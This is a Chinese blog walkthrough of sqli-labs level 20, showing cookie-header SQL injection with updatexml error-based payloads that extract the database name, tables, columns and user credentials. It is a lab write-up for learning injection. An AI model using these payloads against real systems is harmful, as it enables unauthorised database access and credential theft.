sqli-labs关卡20(基于http头部报错盲注)通关思路

文章目录

前言
一、回顾上一关知识点
二、靶场第二十关通关思路
- 1、判断注入点
- 2、爆数据库名
- 3、爆数据库表
- 4、爆数据库列
- 5、爆数据库关键信息
总结

前言

此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不能随意去尚未授权的网站做渗透测试！！！

一、回顾上一关知识点

通过上一关的referer字段的注入，我们更加熟悉了http头部注入。这一关也是http头部注入，只是换地方了

二、靶场第二十关通关思路

1、判断注入点
2、爆数据库名
3、爆数据库表
4、爆数据库列
5、爆数据库关键信息

1、判断注入点

发现第二十关的界面啥都没有了，按照之前通关的思路。我们先把测试账号admin登录进去，发现有记录cookie的信息回显到页面。(如图所示)
在这里插入图片描述
从上两关总结的经验得到，这一次应该就是http头部的cookie注入了。我们重新登录admin抓包，果然发现请求包有cookie值。这里我们使用and 1=1 和 and 1=2，发现页面正常，说明不是数字型。我们直接提交1'发现报错，报错信息为

Issue with your mysql: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘‘admin’’ LIMIT 0,1’ at line 1

在这里插入图片描述
通过报错信息我们可以构造payload,发现就是简单的单引号闭合

uname=admin'#

2、爆数据库名

注入语句为

' and updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述

3、爆数据库表

注入语句为

' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键数据库表名users

4、爆数据库列

注入语句为

' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

在这里插入图片描述

得到关键数据库列username，password

5、爆数据库关键信息

注入语句为

' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

' and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述

得到账号密码

总结

这一关和前几关都差不多，只是注入点不一样罢了。此文章是小白自己为了巩固sql注入而写的，大佬路过请多指教！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mfbz.cn/a/161685.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！